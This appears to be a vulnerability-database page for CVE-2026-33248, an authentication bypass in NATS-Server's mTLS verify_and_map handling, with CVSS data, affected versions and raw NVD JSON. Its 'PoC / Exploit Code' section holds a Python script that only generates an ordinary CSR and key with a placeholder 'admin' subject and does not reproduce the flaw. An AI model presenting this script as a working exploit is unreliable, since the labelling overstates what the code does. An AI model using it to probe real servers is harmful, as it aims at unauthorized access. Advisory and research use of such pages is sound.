Security Vulnerability Report
CVE-2026-33248 CVSS 4.2 MEDIUM

CVE-2026-33248

Published: 2026-03-25 21:16:48
Last Modified: 2026-03-26 16:22:06

Description

NATS-Server is a High-Performance server for NATS.io, a cloud and edge native messaging system. Prior to versions 2.11.15 and 2.12.6, when using mTLS for client identity, with `verify_and_map` to derive a NATS identity from the client certificate's Subject DN, certain patterns of RDN would not be correctly enforced, allowing for authentication bypass. This does require a valid certificate from a CA already trusted for client certificates, and `DN` naming patterns which the NATS maintainers consider highly unlikely. So this is an unlikely attack. Nonetheless, administrators who have been very sophisticated in their `DN` construction patterns might conceivably be impacted. Versions 2.11.15 and 2.12.6 contain a fix. As a workaround, developers should review their CA issuing practices.

CVSS Details

CVSS Score
4.2
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N
Weaknesses
CWE-287 (Improper Authentication), CWE-295 (Improper Certificate Validation)

Configurations (Affected Products)

cpe:2.3:a:linuxfoundation:nats-server:*:*:*:*:*:*:*:* (versions before 2.11.15) - VULNERABLE
cpe:2.3:a:linuxfoundation:nats-server:*:*:*:*:*:*:*:* (versions 2.12.0 up to but excluding 2.12.6) - VULNERABLE
nats-io/nats-server < 2.11.15
nats-io/nats-server >= 2.12.0, < 2.12.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
"""
PoC for CVE-2026-33248: NATS-Server Authentication Bypass

Generates a CSR whose Subject DN can be shaped to probe the `verify_and_map`
enforcement. Note: the CSR must be signed by a CA the target server already
trusts for client certificates, and the advisory does not disclose which RDN
pattern was mishandled, so the subject below is a placeholder to adapt.
"""
from cryptography import x509
from cryptography.x509.oid import NameOID
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.asymmetric import rsa


def generate_malicious_csr():
    # Generate the client's private key.
    key = rsa.generate_private_key(public_exponent=65537, key_size=2048)

    # Subject DN. As written this is three single-valued RDNs (CN, O, OU), the
    # ordinary shape most CAs issue. The page does not say which RDN pattern
    # the server fails to enforce, so mirror your own CA's issuance patterns
    # here when testing.
    name = x509.Name([
        x509.NameAttribute(NameOID.COMMON_NAME, "admin"),
        x509.NameAttribute(NameOID.ORGANIZATION_NAME, "MyOrg"),
        x509.NameAttribute(NameOID.ORGANIZATIONAL_UNIT_NAME, "SpecialUnit"),
    ])
    csr = (
        x509.CertificateSigningRequestBuilder()
        .subject_name(name)
        .sign(key, hashes.SHA256())
    )
    print("[+] Generated CSR.")
    print(csr.public_bytes(serialization.Encoding.PEM).decode())

    # Save the private key (written unencrypted; protect the file).
    with open("malicious.key", "wb") as f:
        f.write(key.private_bytes(
            encoding=serialization.Encoding.PEM,
            format=serialization.PrivateFormat.TraditionalOpenSSL,
            encryption_algorithm=serialization.NoEncryption(),
        ))

    # Save the CSR.
    with open("malicious.csr", "wb") as f:
        f.write(csr.public_bytes(serialization.Encoding.PEM))

    print("[+] Files saved. Submit 'malicious.csr' to your trusted CA for signing.")
    print("[!] Once signed, use the certificate to connect to the target NATS server.")


if __name__ == "__main__":
    generate_malicious_csr()
```

References

https://advisories.nats.io/CVE/secnote-2026-13.txt (Vendor Advisory)
https://github.com/nats-io/nats-server/security/advisories/GHSA-3f24-pcvm-5jqc (Vendor Advisory)
Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-33248", "sourceIdentifier": "[email protected]", "published": "2026-03-25T21:16:47.563", "lastModified": "2026-03-26T16:22:06.270", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "NATS-Server is a High-Performance server for NATS.io, a cloud and edge native messaging system. Prior to versions 2.11.15 and 2.12.6, when using mTLS for client identity, with `verify_and_map` to derive a NATS identity from the client certificate's Subject DN, certain patterns of RDN would not be correctly enforced, allowing for authentication bypass. This does require a valid certificate from a CA already trusted for client certificates, and `DN` naming patterns which the NATS maintainers consider highly unlikely. So this is an unlikely attack. Nonetheless, administrators who have been very sophisticated in their `DN` construction patterns might conceivably be impacted. Versions 2.11.15 and 2.12.6 contain a fix. As a workaround, developers should review their CA issuing practices."}, {"lang": "es", "value": "NATS-Server es un servidor de alto rendimiento para NATS.io, un sistema de mensajería nativo de la nube y del *edge*. Antes de las versiones 2.11.15 y 2.12.6, al usar mTLS para la identidad del cliente, con 'verify_and_map' para derivar una identidad NATS del DN del Asunto del certificado del cliente, ciertos patrones de RDN no se aplicarían correctamente, permitiendo la omisión de autenticación. Esto requiere un certificado válido de una CA ya confiable para certificados de cliente, y patrones de nombres de 'DN' que los mantenedores de NATS consideran altamente improbables. Por lo tanto, este es un ataque improbable. No obstante, los administradores que han sido muy sofisticados en sus patrones de construcción de 'DN' podrían verse afectados. Las versiones 2.11.15 y 2.12.6 contienen una corrección. Como solución alternativa, los desarrolladores deberían revisar sus prácticas de emisión de CA."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 4.2, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-287"}, {"lang": "en", "value": "CWE-295"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:linuxfoundation:nats-server:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.11.15", "matchCriteriaId": "13EA156E-2759-4586-A22E-CDEAAD4D610C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:linuxfoundation:nats-server:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.12.0", "versionEndExcluding": "2.12.6", "matchCriteriaId": "4E347CFB-C56D-4FD8-8DD8-3D34C08D7154"}]}]}], "references": [{"url": "https://advisories.nats.io/CVE/secnote-2026-13.txt", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://github.com/nats-io/nats-server/security/advisories/GHSA-3f24-pcvm-5jqc", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}